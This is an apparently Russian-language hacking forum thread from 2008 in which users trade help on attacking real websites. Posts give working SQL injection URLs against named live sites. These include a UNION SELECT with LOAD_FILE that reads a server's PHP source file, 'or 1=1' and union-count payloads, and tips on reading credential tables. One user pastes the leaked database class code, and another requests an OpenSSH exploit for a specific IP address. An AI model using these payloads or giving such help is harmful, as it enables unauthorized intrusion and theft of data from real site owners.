Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    ошибся ты в том, что тут возможен бы был локальный инклюд, если бы не было экранирования спец символов типа кавычки и нуля, причем как я понял там еще и фильтрация какая то написана, хотя насчет фильтрации хз, но экранирование не дает провести локальный инклюд
     
  2. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Подскажите пожалуйста, есть какая нибудь прога для подстановки чисел в SQL инъекций, ну а точнее ВОТ прочитал я эту статью, и там написано

    Ну вот есть прога для атоматической подстановки чисел?) Я много раз читал эту статью, токо вот с подстановкой не выходит, )
    Вручную чтоли делать?)

    А эти шаблоны уже заепали) и вправду самому надо думать, а не готовыми инъекциями)

    Ну вот такой у меня вопрос, может не внимательно я смотрел на ачате, может есть такая прога?)
     
    1 person likes this.
  3. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Sql injection tool by SQLHACK может быть?
     
    1 person likes this.
  4. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://topofgames.com/index.php?cat_id=72'

    Подставил какое-то значение не помню,вывело ашиппку.Стоит фильтрация на кавычку.Вместо неё куча обратных слешей:РР

    http://www.dotfiles.com/index.php?cat_id=-6+order+by+1/*

    Дыра есь,но как обойти хз:РР
     
    #924 Велемир, 12 Feb 2008
    Last edited: 12 Feb 2008
  5. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,LOAD_FILE('/var/www/vhosts/nlstar.net/req/class.db.php')+from+mysql.user/*
    код выпадет в исходник

    всегда смотри file_priv, дальше советую поискать какие нибудь конфиги или исходники авторизации
     
  6. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    гага,до мя щас ток дошло че делать))))))))).Пасиб те! )если б все так отвечали Ж...
     
  7. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    шотто я ниче не вижу....там где написано Каталог Продукции Nl есь какой-то кусок кода,и усё:Р Можно чутка поподробней? А то я нуп Ж(
     
  8. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Исходный код страницы посмотри. там и будет исходника файла
     
  9. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    _http://62.140.233.125/wow2/index.php?n=account/create
    Может кто-нить подскажет двиг или баги в нем?
     
  10. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    есть сайт с инекцией
    http://wgem.com/Community/event.php?ID=5014'
    если через group by подбирать колличество то получается 8
    http://wgem.com/Community/event.php?ID=5014+group+by+8
    А когда начинаю писать
    http://wgem.com/Community/event.php?ID=5014+union+select+1,2,3,4,5,6,7,8/*
    выдает что их не 8... что не так?
     
  11. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Просто там этот id используется в двух запросах к разным таблицам, а посему тут слепая инъекция
     
  12. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    m0use кури more than 1 row от Elekt'а , там реально все сделать.
    Ветка там 4, таблица users, колонки: id,username,password
     
  13. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    да, можно конечно, но это сложнее для понимания чем например
    http://wgem.com/Community/event.php?ID=-5014/**/or/**/1=1/*
     
  14. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    class DBMysql {

    var $Connected;

    var $Connection;

    function DBMysql($connection_string) {
    $this->Connected = FALSE;
    $pattern = '/^([\w\d]+):([^\s]*)@([.\w\d]+);([\w\d]+)$/';
    $matches = array();
    if ( preg_match($pattern, $connection_string, $matches) != 0 ) {
    array_shift($matches);
    list($username, $password, $host, $database) = $matches;
    if ( $c = @mysql_connect($host, $username, $password) ) {
    if ( @mysql_select_db($database, $c) ) {
    $this->Connected = TRUE;
    $this->Connection = $c;
    $this->Query("SET NAMES cp1251");
    }
    }
    }
    return($this->Connected);
    }

    function Close() {
    @mysql_close($this->Connection);
    $this->Connected = FALSE;
    }

    function Query($query) {
    $args = func_get_args();

    if ( sizeof($args)-1 != substr_count($query, '?') ) trigger_error('Wrong arguments count<br>' . $query, E_USER_ERROR);
    $sql = "";
    $q = 1;
    while ( ($pos = strpos($query, '?')) !== FALSE ) {
    $l = $query[$pos-1];
    $r = $query[$pos+1];
    if ( $l == $r ) {
    switch ($l) {
    case '"':
    $args[$q] = str_replace('"', '\"', $args[$q]);
    break;
    case '\'':
    $args[$q] = str_replace('\'', '\\\'', $args[$q]);
    break;
    case '`':
    $args[$q] = preg_replace('/[^a-zA-Z0-9_]/', '' , $args[$q]);
    break;
    }
    }
    else if ( !is_numeric($args[$q]) )
    $args[$q] = '\'' . str_replace('\'', '\\\'', $args[$q]) . '\'';

    $sql .= substr($query, 0, $pos) . $args[$q];
    $query = substr($query, $pos+1, strlen($query)-$pos);
    $q++;
    }
    $sql .= $query;

    // echo $sql . '<hr>';
    $result = mysql_query($sql, $this->Connection) or trigger_error('<b>Ошибка SQL запроса:</b> ' . $sql . '<br />' . mysql_error(), E_USER_ERROR);
    return($result);
    }

    function Fetch($result) {
    $row = @mysql_fetch_array($result);
    return($row);
    }

    function FetchQuery($query) {
    $args = func_get_args();
    $result = call_user_func_array(array(&$this, 'Query'), $args);
    $row = $this->Fetch($result);
    return($row);
    }

    function FetchAll($result) {
    $r = array();
    while ( $row = $this->Fetch($result) ) $r[] = $row;
    return($r);
    }

    function NumRows($result) {
    $n = @mysql_num_rows($result);
    return($n);
    }

    function IsEmpty($result) {
    $result = ( $this->NumRows($result) == 0 ) ? TRUE : FALSE;
    return($result);
    }

    function LastInsertID() {
    return(mysql_insert_id($this->Connection));
    }
    }

    $dbtable = array();
    foreach (explode(',', $tablenames) as $tablename) {
    $tablename = trim($tablename);
    $dbtable[$tablename] = $db_prefix . $tablename;
    }

    $db = new DBMysql($DB_CONNECTION_STRING);
    ?>

    Просмотрел,поискал,не понял:Р Что там должно быть такое,что меня так сильно интересует )))))
     
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    а хз чё тебе надо
     
  16. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    плиз, подскажите, есть для этого SSH-1.99-OpenSSH_3.9p1 сплойт
    сервак висит под этим ip 65.98.230.4

    http://forum.antichat.ru/showpost.php?p=591791&postcount=4841
     
  17. Lesnoy_chelovek

    Lesnoy_chelovek Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    224
    Likes Received:
    152
    Reputations:
    8
    kair
    http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=OpenSSH+3.9p1&x=0&y=0
    http://search.securityfocus.com/swsearch?query=SSH+1.99&sbm=%2F&submit=Search%21&metaname=alldoc&sort=swishrank

    Ох не знал я, что поисковики отменили.
     
  18. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    А поподробней можно? что за more than 1 row от Elekt'а?
     
  19. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    http://forum.antichat.ru/threadnav35207-1-10.html
     
    1 person likes this.
  20. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25

    написали смотреть в исходник- смотрю :Р.там лоад фаил пахал,я и просмотрел исходник.
     
Thread Status:
Not open for further replies.